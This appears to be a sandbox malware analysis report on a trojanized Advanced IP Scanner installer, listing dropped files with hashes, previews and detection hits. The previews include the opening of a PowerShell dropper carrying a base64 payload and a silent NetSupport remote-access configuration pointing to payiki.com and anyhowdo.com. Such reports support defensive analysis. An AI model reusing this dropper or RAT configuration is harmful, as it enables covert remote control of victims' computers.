Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Oct 31 17:01:02 2024, mtime=Thu Oct 31 17:01:02 2024, atime=Fri Apr 29 17:13:52 2022, length=1681960, window=hide
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	4.574105269417947
Encrypted:	false
SSDEEP:	24:8mN/n72ELdOEGgaG2INLsUn4AkS/uf/aoT5dcaGTUnKxdcaG7jaGOalUUDnqyFm:8mN/n1LdO8a3IKKfryCydcaqKKdca6jH
MD5:	6B19FCDE4C4FD8B59D60AAFD762C9BF1
SHA1:	801D2099342B7F6EBF66BEC3A096DA7417FAEA0A
SHA-256:	D4687431DA01AFA7F877AA387CDEB31D20951AC7FECC7A2C6712E470810C3420
SHA-512:	91E3399F43338F547ED7CA8FF3E6B5BC7980BA521B16633E4914622C175C3881AED00306FED2643AC533378A7874ADE60043DE154678804F523489CD9319EB45
Malicious:	false
Preview:	L..................F.... ....;+.+...b2.+...0s..[..(............................P.O. .:i.....+00.../C:\.....................1....._Y....PROGRA~2.........O.I_Y......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....p.1....._Y$...ADVANC~1..X......_Y"._Y$...............................A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.....\|.2.(....T.. .ADVANC~1.EXE..`......_Y"._Y"..............................a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.......q...............-.......p............EDn.....C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe..Q.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.?.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.A.d.v.a.n.c.e.d._.I.P._.S.c.a.n.n.e.r...i.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

Download File

Process:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	15
Entropy (8bit):	2.7329145639793984
Encrypted:	false
SSDEEP:	3:QJgTG:QkG
MD5:	8AB0D91EF06123198FFAC30AD08A14C7
SHA1:	46D83BB84F74D8F28427314C6084CC9AFE9D1533
SHA-256:	DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
SHA-512:	1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
Malicious:	false
Preview:	32.7767,-96.797

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	5.466044059530951
Encrypted:	false
SSDEEP:	48:QS1WSU4xymI4RfoUeW+mZ9tlNWR831NTxB9001dqZ0:QALHxvIIwLmZXW8nHS01YZ0
MD5:	539FE6FDAF4F97ECFB3DF3EEB3A99FAA
SHA1:	BEFDE31A9A6D89460B54B5E465F0BE299EECFE9E
SHA-256:	F90784416A7BD930799A1A357FFDD9A1648C08FCFA0BBB5878B8093E1E4E0E31
SHA-512:	44C9C85360816D5DF18F714DBA43156C26BA707E4DCC825E7B2CD64A71D6A0DE5B71A7129269532662732372D20AD8A0546DE6D9783421FDC586172F8D95D944
Malicious:	false
Preview:	@...e...........S.....................@.5.......................P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u4jrqvo.fjz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifaitdkc.l4t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plqdcgzc.buv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvpeltol.qou.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Download File

Process:	C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3305472
Entropy (8bit):	6.57660301759331
Encrypted:	false
SSDEEP:	49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PV:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334d
MD5:	597637EDBEBB79D482E762E238209BCD
SHA1:	840091CFDFB0C47AAFD59F127C593DDB1B857C12
SHA-256:	592BEDCC2C1CD3491ED40B3CDB8DD5CA6D248598BDF871145C300028EADAC4CD
SHA-512:	80361FF1154EE2BFFA5B48DAB886E5040536755734CCC94AB170166C5E4C93DBE7052D19DF14DA162F92D2D8390B2C3B7D49416C41C200BFDA12C4030AB458EE
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	ASCII text, with very long lines (65333), with CRLF line terminators
Category:	dropped
Size (bytes):	3035666
Entropy (8bit):	5.9992842391395556
Encrypted:	false
SSDEEP:	49152:We6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:5
MD5:	FBD2C66EE39FEA4BDF9ED9F3C0D8AD28
SHA1:	E3C517FA670A7A895997989E83EE68430EB82714
SHA-256:	A18C7CDA2F17E7819EA29F62F288ACF92360B29B8B2B7C431F3A7E7752352DAF
SHA-512:	556926562836D1DE36C0EACF3494F089996A5896DCE1B0EC6DBFB2F1274CD964B378F128401BFD156D295C3D5BF52200F96193DE6B78A4EE49ED2B9560502E76
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1, Author: Joe Security
Preview:	$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\SysHelper";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFel

C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93560
Entropy (8bit):	6.5461580255883876
Encrypted:	false
SSDEEP:	1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:	4182F37B9BA1FA315268C669B5335DDE
SHA1:	2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:	A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
SHA-512:	4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........in.:n.:n.:g.6:\|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\NSM.LIC

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.103526864179364
Encrypted:	false
SSDEEP:	6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
MD5:	866C96BA2823AC5FE70130DFAAA08531
SHA1:	892A656DA1EA264C73082DA8C6E5F5728ABCB861
SHA-256:	6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
SHA-512:	0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
Malicious:	true
Preview:	1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3642864
Entropy (8bit):	6.5156874906689275
Encrypted:	false
SSDEEP:	49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
MD5:	214A714EF11C2C91162A9344BF8F2E50
SHA1:	B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
SHA-256:	74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
SHA-512:	A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.\|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459760
Entropy (8bit):	6.678291257338415
Encrypted:	false
SSDEEP:	12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
MD5:	69F72AD2DAD99FF0FBC7F2C671523014
SHA1:	8AAAB0955014B89CA794A51DD527D3AFE6F38A94
SHA-256:	23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
SHA-512:	EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	121304
Entropy (8bit):	6.150456878585649
Encrypted:	false
SSDEEP:	768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
MD5:	4F2D0F4A5BA798FA9E85379C7C4BD36E
SHA1:	E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
SHA-256:	AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
SHA-512:	4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\client32.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	638
Entropy (8bit):	5.396410176198281
Encrypted:	false
SSDEEP:	12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
MD5:	74BEF725496CD35EEB6F6B94E1EDDDFD
SHA1:	616AB761A1429E982062009B5C319F796A60BA1B
SHA-256:	8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
SHA-512:	C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
Malicious:	false
Preview:	0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..

C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\nskbfltr.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
